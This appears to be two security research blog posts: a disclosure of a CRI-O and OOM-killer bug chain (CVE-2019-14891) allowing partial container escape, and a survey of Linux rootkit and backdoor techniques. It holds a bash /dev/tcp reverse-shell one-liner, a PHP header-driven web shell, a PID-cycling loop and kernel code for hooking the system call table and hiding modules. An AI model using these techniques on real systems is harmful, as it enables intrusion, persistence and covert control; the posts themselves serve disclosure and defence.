Nov 20 00:56:34 ubu-disco kernel: [  136.324595] oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=/,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podf8e932ad_5487_4514_a5be_b75ad1b7a6ce.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podf8e932ad_5487_4514_a5be_b75ad1b7a6ce.slice/crio-ee55f03bd921c55955d8995a0adbb9f19352603a637ea27f6ca8397b715435eb.scope,task=repro,pid=4304,uid=0
Nov 20 00:56:34 ubu-disco kernel: [  136.324600] Memory cgroup out of memory: Kill process 4304 (repro) score 1657 or sacrifice child
Nov 20 00:56:34 ubu-disco kernel: [  136.324627] Killed process 4304 (repro) total-vm:266656kB, anon-rss:14504kB, file-rss:24kB, shmem-rss:0kB
Nov 20 00:56:34 ubu-disco kernel: [  136.328368] oom_reaper: reaped process 4304 (repro), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB

CRI-O gets +1 for visibility into resource usage, but -9001 for stability — because sometimes, if the OOM killer becomes an OOM serial killer and triggers multiple times, it can kill a container monitor (conmon) process as well as workload and pause processes. This typically manifests as follows:

  1. The workload process (repro, above) allocates a bunch of memory, triggering the OOM killer. 
  2. Very shortly afterwards, and before the OOM killer does its job, one of the conmon processes in the cgroup tries to make an allocation. As the cgroup is already out of memory thanks to the repro process, this triggers the OOM killer again.
  3. OOM killer #1 fires, and kills the workload process for using too much memory. Makes sense. In this case, it tried to allocate 256MB of memory when the cgroup only gave it 18MB.
  4. OOM killer #2 fires, but the offender (the repro process) is already dead. So it kills something else instead. Quite often, it kills the conmon process of the pause (infrastructure) container — which we’ll cover in the next section.

Having conmon in the same cgroup as the containerized processes exposes the underlying container management systems to being killed. CVE-2019-14891 was issued for this problem we identified, which was resolved by putting conmon in a different cgroup to its pods by default.

Issue #2: If a Process Dies in a Forest, and No One is Around..

Our second issue in this chain of unfortunate events relates to how CRI-O doesn’t get notified if a conmon process is killed. No action is taken by CRI-O because CRI-O thinks the conmon process is still alive and well. Unfortunately, it isn’t. While not necessarily a vulnerability, the decentralized container management approach does play its part in this chain of bugs. This is part of a design decision by the CRI-O team: containers should not be tied to daemon, and we as users should be able to restart the cri-o daemon without needing to tear down and rebuild all the containers. 

The conmon container monitor process is important because it, well, monitors a container. If conmon is gone-mon, there is no way for conmon to communicate to the container engine (CRI-O) about the health of whatever it was monitoring. If a conmon process is killed, then whatever process was being managed by that conmon process is re-parented to init or PID 1. If a pause process’ conmon process is killed, then that pause process ends up being reparented to init and it just kind of floats there (more on why that’s bad below). CRI-O still thinks the pod is fully intact. 

Let’s pause for a bit

It’s probably worth taking a second to talk about the pause process and why it’s important. No super-gory details, but enough for some context.

When Kubernetes spins up a pod, it first creates an infrastructure container / pause process. You can actually kind of think of the pod as being the pause process: it holds the namespaces for the pod, and is the parent of the containers that live inside it. And if the infrastructure container (pause process) dies, all of the workload containers in the pod are culled, too.

After the pause process is started, a specification for the containers in that pod is created. The specification includes references for where containers in that podshould get their namespaces from. Whenever a workload process is created (e.g. the nginx container or whatever you were expecting to run), runc will apply the namespaces stored in this specification to the new process using the setns() system call. This ensures that if your nginx process dies, its replacement will be in the same namespaces as its predecessor. By default, a pod will have its own network, IPC, and UTS namespaces. 

Now, let’s return to why the pause process floating in init limbo presents such an issue.

Issue #3: Grief Is A Process

The final part of the puzzle is how CRI-O manages namespaces for pods, which are stored in the form of proc paths for the pause process (e.g. /proc/$PAUSEPID/ns/ipc). As noted in the previous section, these paths are used as the target of setns() calls for all containers created in that pod.

If the pause process goes away — say, due to being killed by that same overzealous OOM serial killer in the kernel — CRI-O never learns that the pause process is gone. This is important, because the next time CRI-O tries to create the workload container, it’s going to tell runc to copy all of the namespaces over from those /proc/$PAUSEPID/ns/x paths. But, runc fails to start the container, as the PID in the namespace path no longer exists due to the pause process’ untimely murder:

Nov 20 01:35:48 ubu-disco crio[871]: time="2019-11-20 01:35:48.213858401Z" level=error msg="Container creation error: container_linux.go:338: creating new parent process caused \"container_linux.go:1897: running lstat on namespace path \\\"/proc/18235/ns/ipc\\\" caused \\\"lstat /proc/18235/ns/ipc: no such file or directory\\\"\"\n"

Ultimately, PIDs gets recycled, and $PAUSEPID will be assigned to some other new process. Assuming the new owner of $PAUSEPID is still alive when Kubernetes next tries to schedule that pod, runc will dutifully copy over whatever namespaces the new, shiny $PAUSEPID has. If $PAUSEPID belongs to a node process (instead of a pod process), then the new container gets host IPC, NET, and UTS namespaces, which looks something like this:

Nov 20 01:37:04 ubu-disco systemd[1]: Started crio-conmon-d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.scope.
Nov 20 01:37:04 ubu-disco systemd[1]: Created slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Removed slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Started libcontainer container d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.
Nov 20 01:37:04 repro-pod10-6c8bdc448f-47mhk systemd-resolved[687]: System hostname changed to 'repro-pod10-6c8bdc448f-47mhk'.

Aside from giving the attacker the ability to change the hostname, this also lets the attacker interact with the underlying node’s network interfaces and traffic, as well as its IPC/shared memory instances. Simply put, the attacker can discover any sensitive data flowing through the node (i.e. any pods running on it). Our PoC video demonstrates us using tcpdump to show network traffic on all of the node’s interfaces.

This issue is in the process of being resolved by the CRI-O team, by creating namespace file descriptors and bind-mounting them into pods instead of hard-coding a path to a transient process in /proc. This means that when runc creates the workload container again, it won’t be relying on a path that could have information belonging to an out-of-pod process. This should land in the next couple of weeks, but really, the patch for issue #1 will largely mitigate this issue if you run CRI-O.

All Together Now

The steps we describe below outline how the above issues could be grouped together to achieve a partial container escape – where we get some host namespaces (ipc, net and uts), but not all of them. The process names and PIDs referenced below line up with those in the video, if you want to play along.

1 – A new pod is created with a memory limit, resulting in four processes and two containers:

  • pause (the infrastructure container / pod process) and its associated conmon. The PID of the pause process (18235) is used to construct namespace paths (e.g. /proc/18235/ns/ipc) that are assigned to the sandbox container specification which is used when creating new containers in the pod.
  • repro (the workload container / process) and its associated conmon. It gets its namespaces assigned from the pause process (PID 18235). The repro process first checks to see if it’s in the node’s UTS namespace. If it is, it sends a reverse shell to the attacker. If it isn’t, it tries to allocate 256MB of memory. Here’s the pod configuration we used:
apiVersion: apps/v1
kind: Deployment
  name: repro-pod2
      name: repro-pod2
        name: repro-pod2
        - name: repro-pod2
              memory: 21Mi
          command: ["/repro"]
          args: ["", "4444"]
      - name: regcred

2 – The workload process (repro) allocates too much memory, invoking the kernel’s OOM killer.

3 – While this is taking place, the conmon process that manages the workload process also tries to allocate something, but as its memory cgroup is still in an OOM state, this fails too and invokes the kernel’s OOM killer. The OOM killer’s actions are serialized, so this takes place after the OOM killer round initiated from step #2.

  • Sometimes, a third allocation occurs at the same time. When this happens, we might skip steps #7-10, as the OOM killer kills the pause process at the same time.

4 – The OOM killer from step #2 kills the misbehaving workload process (repro) successfully.

Nov 20 01:35:43 ubu-disco kernel: Tasks state (memory values in pages):
Nov 20 01:35:43 ubu-disco kernel: [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 01:35:43 ubu-disco kernel: [  18197]     0 18197    19521      476    57344        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18235]     0 18235      255        1    32768        0          -998 pause
Nov 20 01:35:43 ubu-disco kernel: [  18653]     0 18653    19521      460    53248        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18724]     0 18724    66664     3629    90112        0           996 repro
Nov 20 01:35:43 ubu-disco kernel: oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=crio-2636c2063b8682d6d5c6a81d74d5eddd14dd676445990f1b19e92919d6568acb.scope,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice/crio-2636c2063b8682d6d5c6a81d74d5eddd14dd676445990f1b19e92919d6568acb.scope,task=repro,pid=18724,uid=0
Nov 20 01:35:43 ubu-disco kernel: Memory cgroup out of memory: Kill process 18724 (repro) score 1656 or sacrifice child
Nov 20 01:35:43 ubu-disco kernel: Killed process 18724 (repro) total-vm:266656kB, anon-rss:14504kB, file-rss:12kB, shmem-rss:0kB
Nov 20 01:35:43 ubu-disco kernel: conmon invoked oom-killer: gfp_mask=0x6040c0(GFP_KERNEL|__GFP_COMP), order=0, oom_score_adj=-999

5 – The OOM killer from step #3 starts (you can actually see it in the last line of the output above), and decides someone else needs to die. Sometimes this is the other conmon process — the one watching over the pause / infrastructure process. CRI-O is not informed of this death, and thinks that everything is still fine (aside from the workload process being killed, which triggers the usual Kubernetes backoff process). 

  • In the case below, the pause process was actually killed first.
Nov 20 01:35:43 ubu-disco kernel: Tasks state (memory values in pages):
Nov 20 01:35:43 ubu-disco kernel: [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 01:35:43 ubu-disco kernel: [  18197]     0 18197    19521      476    57344        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18235]     0 18235      255        1    32768        0          -998 pause
Nov 20 01:35:43 ubu-disco kernel: [  18653]     0 18653    19521      460    53248        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=/,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice/crio-conmon-d2f0d56a2b6de8b76ecbcde807b5297c416cc909457b75842beb7b661a001f94.scope,task=conmon,pid=18197,uid=0
Nov 20 01:35:43 ubu-disco kernel: Memory cgroup out of memory: Kill process 18197 (conmon) score 0 or sacrifice child
Nov 20 01:35:43 ubu-disco kernel: Killed process 18235 (pause) total-vm:1020kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB

6 – With the infrastructure container’s conmon dead, its process (pause) is orphaned and reparented to the node’s init process.

7 – Backoff timeout is reached, and the Kubelet asks CRI-O to make another workload process (repro) for the pod, which it does. As expected, runc is invoked and it copies the namespaces from the pause paths (/proc/18235/ns/[ipc|net|uts])

8 – The new workload process (a new repro) allocates too much memory again, invoking the OOM killer again. (same as step #2)

9 – The workload’s conmon process tries to allocate something while the cgroup is OOMed, also invoking the kernel’s OOM killer (same as step #3)

10 – The OOM killer from step #8 kills the workload process (same as step #4)

11 – The OOM killer from step #9 looks for something to kill, and settles on the pause process (PID 18235). CRI-O is not informed of its death. The sandbox container specification (from step 1.1) is not changed, and still holds a reference to the now-dead pause process’ namespace paths (/proc/18235/ns/[ipc|net|uts]).

Note: At this point, all processes related to the pod are dead. The only remaining references to the sandbox exist in CRI-O.

12 – Step #7 keeps on repeating, but failing, because whenever a new repro / workload process is started, runc tries to copy over its namespaces from the paths in the container spec (those of the dead pause process, 18235). This is where we see that “lstat” error in logs from Issue #3:

Nov 20 01:35:48 ubu-disco crio[871]: time="2019-11-20 01:35:48.213858401Z" level=error msg="Container creation error: container_linux.go:338: creating new parent process caused \"container_linux.go:1897: running lstat on namespace path \\\"/proc/18235/ns/ipc\\\" caused \\\"lstat /proc/18235/ns/ipc: no such file or directory\\\"\"\n"

13 – Eventually, PIDs wrap, and some other process gets PID 18235 (the PID of the old pause process). We can help this along with a loop, which will iterate through all PIDs until it is assigned the desired PID, at which point it sleeps — ensuring that the PID is referenceable by runc when it’s next time to create the repro container:

while :; do sh -c 'if [ $$ -eq 18235 ]; then echo "Sleeping as PID $$"; exec sleep 700; fi'; done

14 – Step #7 repeats again, and the workload process / container is successfully launched,  because runc could copy namespaces from our sleep process. If that new PID is in a different namespace (e.g. the host’s namespace), then the containerized process gets those namespaces. The namespaces copied are net, uts, and ipc.

15 – As the workload is being created, runc runs sethostname() which would normally set the contained process’ hostname to the pod’s name. Due to the container now having the node’s uts namespace, the whole node is assigned the pod’s name.

Nov 20 01:37:04 ubu-disco systemd[1]: Started crio-conmon-d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.scope.
Nov 20 01:37:04 ubu-disco systemd[1]: Created slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Removed slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Started libcontainer container d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.
Nov 20 01:37:04 repro-pod10-6c8bdc448f-47mhk systemd-resolved[687]: System hostname changed to 'repro-pod10-6c8bdc448f-47mhk'.

Here’s the video of it all in play:

Exploitation scenario

The likelihood of these bugs actually being exploited is pretty minimal. It requires a few stars to be aligned:

  • The target is running CRI-O, which has relatively low adoption
  • The target is running a kernel between v4.19 and 5.2 (inclusive)
  • The attacker can either 1) deploy a pod of their choosing or 2) control an image that they know will be deployed, and know that it will be deployed with a memory limit in place
  • The PID race is won (could take some time)
  • And even then, the impact depends on the deployment and whether there is actually something of value to dump or interact with on the host’s network interfaces.

These things could definitely happen, but that’s a lot of stars.


This is a pretty quirky collection of issues that, when combined, could result in an unprivileged pod getting access to sensitive host resources — such as privileged services running on the loopback interface, shared memory/IPC resources, and the ability to watch any network traffic on the node. Patch and reconfigure CRI-O or upgrade your kernel to the 5.3.x series so you won’t need to thank your lucky stars.

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.

Don’t Get Kicked Out! A Tale of Rootkits and Other Backdoors

Posted by


When it comes to rootkits and other backdoors, everything is on the table. There exists a vulnerability that can be exploited in a system binary to gain root access? There’s a rootkit1 for that. You allow kernel modules? A plethora of nefarious goodies can be part of your system! Your new chip is made in a third-party factory? You get the idea.

In this post, we will focus on software backdoors commonly seen in Linux environments, we will attempt to outline some representative examples, and we will discuss common techniques backdoor authors use to hide their malicious payloads.

What’s a backdoor?

Most things that are or that can be made persistent in a system are candidates for rootkits and backdoors — options are only limited by the imagination and ingenuity of attackers. What’s worse, even in cases where no privilege escalation to root is involved (enabling a rootkit), backdoors are at least as privileged as the respective service, component, or user, which, most likely, is enough to cause you trouble. 

Once a backdoor has been installed, you can only hope someone notices, and given the multitude of means for attackers to get a foothold on your system (from build scripts and userspace applications to long-running utilities), it is hard to know where to look, or what to look for. After all, it only takes one malicious actor with the capability to install some malicious payload in some part of your system ;).  If such a foothold is established, attackers can now exfiltrate information, alter the normal operation of the system, bring services down, or take other undesirable actions. 

Although not as hard to detect as hardware backdoors, software backdoors and rootkits are a severe threat, used for state and corporate spying, information exfiltration, botnet command and control, or as stepping stones for reconnaissance and exploitation of other devices on the network.

The first rootkits date back to the early 1990s. These instances of backdoors simply replaced or modified files on the victim’s hard disk (e.g., replacing the UNIX login program with a malicious one). In the mid 90s, kernel rootkits appeared on Linux systems in the form of kernel modules, and, by the end of the decade, they existed for most UNIX-like operating systems like Solaris and FreeBSD, as well as for Windows

As rootkits evolved, attackers started devising more elaborate ways to modify in-memory contents of the running kernel or applications, as well as infecting the BIOS or device firmware, or using virtualization technology and hardware features to their advantage. Today, rootkits and other backdoors come in many forms and shapes. In this post, we will attempt to outline some representative examples of different types of backdoors, and discuss common techniques deployed in each case.

Species’ Samples

Overall, backdoors can be split into four large groups, depending on whether they exploit hardware or software vulnerabilities and also depending on whether they operate in kernel space or user space. In this post, we will focus only on software backdoors, and present some representative techniques for kernel and userspace backdoors, respectively. The outline of the rest of the post is the following:

Software / Kernelspace

Rootkits Abusing Loadable Kernel Modules (LKM)

This is the oldest and by far the most popular category of kernel rootkits seen in the wild. The first rootkits (ab)using kernel modules where described by Solar Designer, halflife, plaguez and others. The great benefit of LKM-based rootkits is that they are very powerful, allowing attackers to do (almost) anything in the system. Their biggest drawback is that they are neither backwards nor upwards compatible and are almost certain to break as kernel versions change. Moreover, bugs in the code are likely to have (very) noticeable side effects, even resulting in a system crash.

Usually a kernel rootkit’s primary goal is to maintain privileged access, which it can achieve through a number of means:

  • Altering system behavior (e.g., by hijacking system call tables or interrupt handlers)
  • Hiding itself
  • Hiding other files, directories and processes
  • Providing mechanisms for regaining privileges, which could be through:
    • Escalating privileges for given users or processes
    • Triggering keyloggers
    • Enabling remote connections

In the following section, we’ll examine some of the core techniques used by LKM-based rootkits.

Altering System Behavior

Hooking by Replacing System Calls

A rootkit can hook system calls by replacing pointers in the sys_call_table. However, to do so, it must first locate the system call table (from 2.6.x kernels and on, sys_call_table is not exported). There are various methods to achieve this, some of which are outlined below:

  • If kASLR is not enabled (which is rarely the case nowadays2), the address of the system  call table can be read directly from /boot/ via: grep sys_call_table /boot/$(uname -r) |awk '{print $1}'
  • If CONFIG_KALLSYMS=1 is set in the kernel config, it is trivial to fetch the address of the system call table by running addr = (void *)kallsyms_lookup_name("sys_call_table");
  • Depending on the kernel and architecture, the system call table can be fetched using the interrupt descriptor table and finding the system call interrupt gate. This technique was first proposed by sd & devik and is used by several rootkits. Let us examine how the suterusu rootkit uses this technique: 
    • For x86 the code is as follows:
1. unsigned char code[255];
2. asm("sidt %0":"=m" (idtr));
3. memcpy(&idt, (void *)(idtr.base + 8 * 0x80), sizeof(idt));
4. sct_off = (idt.off2 << 16) | idt.off1;
5. memcpy(code, (void *)sct_off, sizeof(code));
6. p = (char **)memmem(code, sizeof(code), "\xff\x14\x85", 3);
7. if (p) { return *(unsigned long **)((char *)p + 3); }

Instruction at line 2 asks the processor for the interrupt descriptor table, whilst the following instruction gets a pointer to the interrupt descriptor of int 0x80. Line 4 computes the address of int 0x80 entrypoint. Now, the only thing left to look for is the location of  the call sys_call_table(,eax,4) opcode, near the beginning of the int 0x80 entrypoint. This is searched for by looking for the opcode "\xff\x14\x85" which corresponds to the pattern call <x>(, eax, 4). Line 7 returns the desired address.

  • For x86_64 and ARM, similar tricks are performed. For example, in x86_64 the technique is using  rdmsrl(MSR_LSTAR, <offset>); instead of asm("sidt %0":"=m" (idtr)); to fetch the system call table entry before searching for the appropriate call (this is not as trivial with kernels configured to have Retpoline protection for Spectre/Meltdown). 
  • Older rootkits found the system call table by abusing the fact that the sys_call_table was always between the end of the code section (init_mm.end_code) and the end of the data section (init_mm.end_data) of the current process. Since sys_close was exported by the kernel and because the system calls were ordered by their numbers, the address of the table could be found just by subtracting from the pointer of sys_close.

From the above, it is clear that determining the system call table address is not particularly hard given a LKM. Once the system call table address is found, one can replace system calls to their liking. Depending on to what extent the attacker is willing to go, one can overwrite the original address of a certain system call with one of their own, or, to be more subtle, overwrite code in the system call itself to point to their code. 

This is not as trivial in all cases (depending on kernel version and config), especially since recent kernels have enforced memory to be read-only on text pages, and given that SMP requires the changes to be synchronized across all cores. Thus, although implementations are very much architecture-specific, taking Intel x86 architectures as an example, the core gist of the technique used by most rootkits is the following: 

First, if the page for the system call table is read-only it has to be marked as RW:

unsigned int x;
pte_t *pte = lookup_address(sys_call_table, &x);

if (pte->pte &~ _PAGE_RW)
	pte->pte |= _PAGE_RW;

Subsequently, the control bit within CR0 that write-protects memory also needs to be flipped:

unsigned long __cr0;
// per CPU code - make it preemption safe 
// read cr0 and flip the bit
__cr0 = read_cr0() & (~X86_CR0_WP);
// write back the new write-permission enabled bit
// replace the system call table entry
sys_call_table[__NR_system call_of_choice] = (void *)&system call_hook;
// replace the cr0 bit
__cr0 = read_cr0() | X86_CR0_WP;
// all done here

A modification like the above can be detected by comparing the addresses in the system call table against a copy made at a time the system was considered to be uninfected. If attackers employ more sophisticated rewriting techniques, detection must step-up and become more sophisticated itself.

In addition to replacing a system call, a kernel module can also register a new, previously non-existent system call. However, that is clearly less covert than the previous approach of leveraging existing system calls.

Hooking Using Kprobes

Kprobes are a fantastic tool for tracing things in the kernel, and for getting useful information about the execution. A user can set a kprobe on symbols, kernel addresses, functions, etc., and can get access to register and stack state. Essentially, if you register a kprobe, a custom piece of code executes in the probe handler context before execution resumes as usual. Kprobe handlers can execute before or after a function returns, and have access to different states. Clearly this is very powerful, as stated in the kprobe documentation:

“Since kprobes can probe into a running kernel code, it can change the register set, including instruction pointer. This operation requires maximum care, such as keeping the stack frame, recovering the execution path etc. Since it operates on a running kernel and needs deep knowledge of computer architecture and concurrent computing, you can easily shoot your foot.”

As expected, kprobes, as well as the now-deprecated jprobes (another type of tracing mechanism), have been used in rootkits to achieve stealthiness. For instance,  by registering a kprobe handler on file related syscalls, it’s easy to implement file hiding behavior as part of your rootkit.

Module Hiding Techniques

There are a multitude of techniques which modules employ to hide themselves from the system, as well as to hide other malicious files, directories, or processes.

Hiding by (ab)using debug registers

A technique that has been actively used in the wild to hide rootkits is taking advantage of a  debugging mechanism present in x86. A great overview of this technique is presented by halfdead. Debug registers allow users to set hardware breakpoints. As soon as execution flow hits an address marked with a breakpoint, it hands the control to the debug interrupt handler, which then calls the do_debug() function. 

Consider a scenario where you set a breakpoint on the address of the system call table, and then hijack the debug interrupt handler (INT 1) to call your own method, or replace the do_debug method, and thus leave the Interrupt Descriptor Table (IDT) intact. This is very powerful and stealthy, as system calls, for instance, can be controlled by an attacker, and, if done cleverly, this technique can work without touching the system call table, system call table handler, or the INT 80 handler. Further, if  someone tries to detect INT 1 handler modification or place their own handler there (like a debugger would), the attacker can set a secondary breakpoint to watch its own handler’s address. 

Hiding by list manipulation and call hooks

One common way to hide the module from listing /proc/modules and lsmod is by simply removing it from the kernel module list structure (which does not remove it from memory).

An example of such manipulation is listed in the following snippet, taking from this sample rootkit:

// entry before the module in the kernel modules list - store so that we can restore things later
mod_list = THIS_MODULE->list.prev;
// delete this module
THIS_MODULE->sect_attrs = NULL;

// hide from /sys/module

Similar tricks are used to hide binaries from commands like ps, or ls. For instance, if one hooks the getdents system call, they can replace it with their own that monitors for commands trying to list an executable, thereby hiding any malicious activity. One such example is presented in this rootkit.

Rootkits Directly Modifying Kernel Memory

Non-LKM kernel patching was proposed by Silvio Cesare in his Runtime Kernel Patching paper, which proposed (ab)using direct access to memory in Linux, made available through the /dev/mem and /dev/kmem device files. Modern Linux distributions disable this access by default. However, in case CONFIG_STRICT_DEVMEM or CONFIG_DEVKMEM are not properly set in your kernel config, the entirety of the LKM-based functionality can be achieved without LKMs if a user has root access (see for instance this phrack article from 2001 on system call patching). We will not elaborate further in this category due to the overlap with the LKM techniques.

Rootkits Abusing eBPF

This is an interesting and less-explored category that builds on the same principles as the previous ones: if a malicious actor gets privileges on a modern, eBPF-enabled Linux system, they can use tracing capabilities to see everything within the system, as well as write to userspace memory. As a notable example of such a type of rootkit, glibcpwn injects shared libraries into systemd, using bcc-based eBPF kprobes. In particular, the rootkit’s functionality is summarized by the following points:

  • Hooking the timerfd_settime system call, which is called by systemd every minute is hooked
  • Computing an offset to the start of libc by tracking appropriate structs from the arguments passed
  • Returning the stack return address and address of __libc_start_main is to the userland tracer code, and starting a ROP chain

Similar to kernel modules that hide themselves, once an eBPF is attached to a kprobe, it can prevent processes from interacting with the kernel, listing eBPF programs, or listing kernel modules. However, contrary to kernel modules, eBPF filters need to be tied to a running process to stay alive. That said, if that process is init, the rootkit can stay alive as long as the system is running.

Software / Userspace

Contrary to kernel-level rootkits, userspace backdoors usually don’t have absolute powers, but they are easier to write and carry less risk -- they won’t result in the operating system crashing given possible mistakes or version incompatibilities.

Rootkits Replacing Common Utilities

The oldest category of userspace rootkits is those which replace common utilities. Usually, a binary that is running with root privileges is replaced or modified in the running system. Such rootkits can easily be detected by file integrity checking tools and signature-based solutions. Popular tools to scan a system for infections of this sort are chkrootkit and Rootkit Hunter, which check for known signatures/modifications performed by rootkits. For instance, chkrootkit performs a series of tests in the local system for hidden files or modifications performed by their tracked list of rootkits, and lists open connections involving port numbers known to be used by malware. 

Rootkits Abusing ELF Metadata

A thorough demonstration of a metadata-based backdoor is presented by Shapiro et al.: Using Cobbler, the authors demonstrated that it is possible to compile arbitrary payloads into an ELF’s executable metadata, which are then “executed” by the run-time loader (RTLD). To provide a PoC of a backdoor using this technique, they inject a metadata-based backdoor into the ping binary of Ubuntu’s inetutils v1.8. Normally ping runs setuid as root and drops its root privileges early on, also accepting an optional --type argument to customize the type of packets sent. If that argument is provided, ping tests the arguments like so:

if(strcasecmp(, "echo") == 0) {...}

The rootkit overrides the call to setuid() with getuid() (to not produce noticeable side-effects), and overrides the call to strcasecmp() with execl(). This  results in ping not dropping privileges and treating the argument to --type as a path to an executable to be executed. If the flag is not passed, the binary performs its regular functionality.

The key parts behind this implementation are as follows:

  • The compiler building ping does not know where setuid() and strcasecmp() will live at runtime and thus creates entries in the executable’s Global Offset Table (GOT) to be lazily filled by the dynamic linker. However, if an entry in the GOT table is not empty, the address provided will be considered as the location of the respective function in memory.
  • The rootkit crafts metadata to lookup the base address of libc then calculate the offsets of getuid() and execl(), and finally patches the GOT of ping to point to them before the binary is executed. The important part here is that this can be achieved by merely using nine relocation entries and one symbol entry, without making any changes to the executable segments of the binary.

Module Backdoors

When was the last time you checked the integrity of your Apache or PHP modules?  Module-supporting software is a good target for backdoors as they can go undetected from almost all antivirus or network-based IDS systems (since, if written properly, a backdoor on the web server that results in traffic appears as, well, web server traffic). Another appealing aspect to modules is that, in most cases, they are platform independent and can easily be ported to different OSes and versions (e.g., as is the case with PHP). In this section, we present three examples of backdoors using modules, one for PHP and two for the Apache server:

  • PHP-Backdoor registers a PHP extension that hooks operations like hash and sha1 and subsequently logs the inputs to these functions (which are primarily passwords). This is a toy-example, but it is indicative of how different points in the system can be compromised by attackers to exfiltrate information.
  • mod_authg is an Apache module that simply registers a hook handler that fetches contents through Apache’s portable runtime, essentially allowing leakage of system info. For instance, once the module is loaded, one may invoke it by passing /authg?c=id to the target URL and get a reply like the following:
HTTP/1.1 200 OK
Date: Thu, 19 Feb 2015 16:33:30 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 54
Connection: close
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • mod_rootme is an Apache backdoor that can spawn a root shell. If configured properly, Apache is not running as root, but the module enables root access by abusing a pre-fork hook while the Apache process still has root permissions.

Although the above backdoors are stripped-down from their full capability potential, they are indicative of the fact that there are many different points where a system can be compromised. One may argue that such backdoors are often easily detectable through configuration files. However, more advanced hiding techniques can be deployed by attackers, such as hiding malicious payloads within existing modules, or by modifying the appropriate objects. 

For instance, Bußmeyer et al. demonstrate how to attack class-one smart card reader implementations, using a Javascript-based rootkit PoC which works as follows: first they hook appropriate Javascript functions in Firefox’s js3250.dll, then modify the Javascript loaded on window.onload so that every page viewed in an SSL secure banking context includes malicious remote Javascript which performs manipulated transactions that are hidden from the user.

Runtime Backdoors

Instead of modifying a PHP or Nodejs module, why not use the execution environment to your benefit? Runtime backdoors reflect a technique which has been used in the wild when hosts or websites are malicious. For instance, in Rootkits for Javascript Environments, Adida et al. demonstrate how it is possible to alter the Javascript environment in a webpage to steal user passwords when login bookmarklets are involved. Bookmarklets (also known as favelets or Javascript bookmarks) allow users to click on an element in their bookmark bar, and run Javascript in the context of the current web page. 

The bookmarklet feature has been used by common password managers and ads to auto-complete user info in various website forms. However, bookmarklets know nothing about the web page until their code actually executes, and their execution is opportunistic. In the benign scenario, the bookmarklet interacts with the native Javascript environment directly (Figure 1 - left). However, given a malicious webpage, the bookmarklet can be manipulated by interacting with the attacker’s Javascript objects instead (Figure 1 - right).

Figure 1 [src]

This allows, for instance, attackers to steal user passwords if they trick the bookmarklet into using the wrong password for a page.

Script & Config Backdoors

Reverse shells and other types of backdoors can also be implemented as simple scripts that are running in the system. Several such examples exist in open-source repositories and forums, ranging from simple one-liners such as bash -i >& /dev/tcp/<ip>/<port> 0>&1 to full-fledged scripts or binaries. Likewise, a backdoor could be part of untrusted code that is running on the host. For instance, a PHP website with the following code present in its codebase is vulnerable to remote command execution, in which the HTTP header of the request can be used to send commands to the server:

   if (isset($_SERVER['HTTP_CMD'])) {
       echo "<pre>" . shell_exec($_SERVER['HTTP_CMD']) . "</pre>";

Similarly, one can span loggers of various sorts (e.g., nc -vlp 80 (using netcat to log incoming traffic to port 80). Attackers may also achieve persistence by modifying appropriate configuration files or scheduled tasks, such as by updating .bashrc entries to invoke other binaries instead of system utilities, replacing common commands using aliases, or modifying cronjob tasks, which are used to schedule user tasks on a periodic basis. For example, known malware have been “disguising” shell scripts as PNG files, which attempted to replace different users’ cron schedules with contents from freshly-downloaded files, which subsequently start more weird creatures like cryptocurrency miners.

The above examples are just samples of the different possibilities open to attackers, and similar patterns can be applied to all public-facing code: regardless of the programming language used, backdoors can be inserted at every point, from the code itself, to the compiler toolchain, to the continuous integration and shipping stages. As stated in the classic Turing Award lecture “Reflections on Trusting Trust”: “To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software.” (or for that matter, trust that you are in good hands for your runtime protection ;))

Ptrace and inotify Hooks

Being in userland doesn’t mean that you can’t be stealthy. Several backdoors use ptrace to attach to a process and change its arguments by setting a breakpoint on main(). Similarly, one can use ptrace on attach and clone calls, executing a malicious payload in a new thread inside a host binary. Such techniques, as well as using inotify handlers to place read watches on directories that are critical to the detection of the backdoor, have been known to be popular in the wild. 

Inotify is a Linux mechanism for monitoring filesystem events. One can register filesystem change callbacks that trigger if certain directories or files are accessed. Once backdoors detect that someone is about to mess with their files, they can unlink them from their original location, wait for the file/directory traversal to end, then restore things as if nothing ever happened -- kind of like a magic trick.

